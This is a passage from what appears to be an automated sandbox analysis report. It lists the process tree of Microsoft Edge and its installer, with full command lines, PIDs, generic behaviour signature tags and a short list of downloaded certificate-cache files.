          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5356 /prefetch:8
          PID: 3792
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
          PID: 388
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:1
          PID: 1536
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5536 /prefetch:8
          PID: 1052
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
          PID: 4020
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
          PID: 3044
        - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
          PID: 296
        - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
          Signatures: Drops file in Program Files directory
          PID: 3904
          - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff76bc35460,0x7ff76bc35470,0x7ff76bc35480
            PID: 4644
        - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
          Signatures: Suspicious behavior: EnumeratesProcesses
          PID: 3560
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
          PID: 5152
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
          PID: 5936
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 /prefetch:8
          PID: 6032
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3128 /prefetch:8
          PID: 6100
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:8
          PID: 4468
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:8
          PID: 3304
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3180 /prefetch:8
          PID: 4068
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
          PID: 5140

- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Checks SCSI registry key(s); Suspicious use of AdjustPrivilegeToken
  PID: 4960

- C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 240
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
\??\Volume{06969d78-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{40e1b798-992f-4eab-99b6-1644298cd675}_OnDiskSnapshotProp